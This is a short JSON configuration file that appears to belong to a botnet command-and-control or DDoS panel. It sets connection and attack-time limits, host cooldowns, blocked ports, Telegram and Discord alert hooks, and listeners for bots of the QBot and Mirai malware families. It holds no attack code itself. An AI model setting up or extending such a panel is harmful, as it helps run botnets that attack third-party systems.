{
	"Port": 80,
	"MaxCons": 20,
	"MaxTime": 500,
	"IPInfo": "",
	"TelegramBot": "",
	"TelegramChat": "",
	"DiscordWebhook": "",
	"DiscordBot": "",
	"AdminOnlyWeb": true,
	"Blacklist": [],
	"Whitelist": [],
	"BlacklistedPort": [],
	"Powersaving": false,
	"Debug": true,
	"HostCooldown": 800,
	"HostCooldownEnabled": false,
	"QBot": {
		"Host": "0.0.0.0",
		"Port": 2020,
		"Dupes": true,
		"Enabled": false
	},
	"Mirai": {
		"Host": "0.0.0.0",
		"Port": 5555,
		"Dupes": true,
		"Enabled": false
	}
}